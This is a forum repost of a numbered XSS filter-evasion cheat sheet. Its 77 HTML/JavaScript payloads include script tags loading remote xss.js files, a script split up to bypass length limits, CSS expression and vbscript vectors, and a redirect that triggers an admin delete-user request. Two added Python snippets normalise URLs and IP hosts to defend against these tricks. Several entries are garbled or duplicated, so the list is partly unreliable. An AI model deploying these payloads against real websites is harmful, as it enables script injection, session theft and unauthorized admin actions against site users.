It seems t00ls has fairly little material on XSS, so when I saw something good I copied it over; not sure whether any of you need to bookmark this.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically useless domestically, since there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
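Vectors (3) to (19) all work against filters that inspect the raw attribute string, while the browser inspects a decoded, control-character-stripped one. The Python below is an added defensive example, not part of the original post or of the cheat sheet it copies: it applies the same normalisation a browser performs on a URL-typed attribute value (character-reference decoding with or without semicolons, removal of tab/newline/NUL and other control characters, whitespace trimming) and only then allow-lists the scheme. The function names, the ALLOWED_SCHEMES set and the sample inputs are this example's own choices.

```python
"""Added example (not part of the original post): normalise a URL-typed HTML
attribute value the way a browser does before its scheme is checked, so the
obfuscated javascript: forms in the list above fail a single allow-list test."""
import html
import re
from typing import Optional

# Schemes a user-supplied link or image URL may use (an assumption for this
# example; adjust to the application). javascript:, vbscript: and data: are
# deliberately absent.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# The HTML tokenizer and URL parser drop ASCII control characters (TAB, LF, CR,
# NUL, ...) and leading/trailing whitespace before the scheme is interpreted.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

# A URL scheme: a letter, then letters, digits, "+", "-" or ".", then ":".
_SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*):")


def normalise_url(value: str) -> str:
    """Apply the browser-side decoding steps to a raw attribute value."""
    # 1. Decode character references, with or without a trailing semicolon
    #    (&#106; &#x6A; &#0000106 ...), as the tokenizer does for attributes.
    decoded = html.unescape(value)
    # 2. Remove control characters anywhere in the string. This also drops a
    #    literal NUL byte, which is stricter than modern browsers (they map it
    #    to U+FFFD) and therefore safe for a filter.
    decoded = _CONTROL_CHARS.sub("", decoded)
    # 3. Trim leading and trailing whitespace, including non-breaking spaces.
    return decoded.strip()


def url_scheme(value: str) -> Optional[str]:
    """Lower-cased scheme of a normalised URL, or None for a relative URL."""
    match = _SCHEME.match(value)
    return match.group(1).lower() if match else None


def is_safe_url(value: str) -> bool:
    """True if `value` may be emitted into href/src/background (after the
    usual attribute encoding on output)."""
    scheme = url_scheme(normalise_url(value))
    if scheme is None:
        # Scheme-less URLs, including protocol-relative //host/ forms, are
        # accepted here; add a host check if links must stay on-site.
        return True
    return scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed samples mirroring the obfuscations in the list above.
    for sample in [
        "javascript:alert('XSS')",
        "JaVaScRiPt:alert('XSS')",
        "jav\tascript:alert('XSS')",
        "jav&#x09;ascript:alert('XSS')",
        "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
        "java\x00script:alert('XSS')",
        " &#14; javascript:alert('XSS')",
        "https://example.com/a.png",
        "/static/a.png",
    ]:
        print(is_safe_url(sample), repr(sample))
```

The order of the three steps matters: decoding character references first is what turns an encoded tab (`&#x09;`) into a real one that the control-character pass then removes, and trimming last is what defeats the leading-whitespace variant in (19). Checking the scheme against an allow-list, rather than searching for the string `javascript`, is what makes the case and vbscript: variants irrelevant.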
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG with STYLE
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS gets filtered, you can put JS code into an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can run arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
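Items (70) to (73) rely on the legacy numeric IPv4 forms that inet_aton() and browser URL parsers still accept, so a host allow-list or deny-list that compares strings sees four different hosts where the browser sees one. The Python below is an added defensive example, not code from the original post: it canonicalises those forms (decimal, hexadecimal, octal, mixed, and fewer than four parts) to a single dotted quad, and also strips the trailing dot of an absolute DNS name, before the list is consulted. The function names and the constructed sample URLs are this example's own.

```python
"""Added example (not part of the original post): canonicalise the legacy
numeric IPv4 host forms used in the list above (and trailing-dot DNS names)
so that an allow-list or deny-list compares one representation."""
import re
from typing import Optional
from urllib.parse import urlsplit

# One dotted component as inet_aton() accepts it: hex with 0x, octal with a
# leading 0, or plain decimal. "08" or "1_0" match nothing and are rejected.
_PART = re.compile(r"0[xX][0-9A-Fa-f]+|0[0-7]*|[1-9][0-9]*")


def _parse_part(part: str) -> Optional[int]:
    """Value of one component, or None if it is not a numeric component."""
    if not _PART.fullmatch(part):
        return None
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if part.startswith("0"):
        return int(part, 8)   # "0" alone is octal zero
    return int(part, 10)


def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad form of a numeric IPv4 literal, or None for anything else.

    Follows the inet_aton() rules that URL parsers inherited: 1 to 4 parts
    separated by dots; each part decimal, octal or hex; every part but the
    last must fit in one byte, and the last part supplies all remaining low
    bytes (so "192.168.1" and "3232235521" are both 192.168.0.1)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    numbers = [_parse_part(p) for p in parts]
    if any(n is None for n in numbers):
        return None
    *head, last = numbers
    remaining = 4 - len(head)          # bytes the last part has to fill
    if any(n > 255 for n in head) or last >= 256 ** remaining:
        return None
    value = 0
    for n in head:
        value = (value << 8) | n
    value = (value << (8 * remaining)) | last
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> str:
    """Host part of `url` in canonical form: numeric literals as dotted
    quads, DNS names lower-cased with any trailing dot removed."""
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    return canonical_ipv4(host) or host


if __name__ == "__main__":
    # Constructed URLs mirroring the decimal, hex, octal, mixed and
    # trailing-dot forms; the first four all canonicalise to the same hosts.
    for url in ["http://3232235521/", "http://0xc0.0xa8.0x00.0x01/",
                "http://0300.0250.0000.0001/", "http://66.000146.0x7.147/",
                "http://www.google.com./"]:
        print(canonical_host(url), "<-", url)
```

Run the list check on `canonical_host(url)` rather than on the raw host string; the same normalisation is what prevents an internal address such as 127.0.0.1 from slipping past a deny-list as 2130706433 or 0x7f.0.0.1.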
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>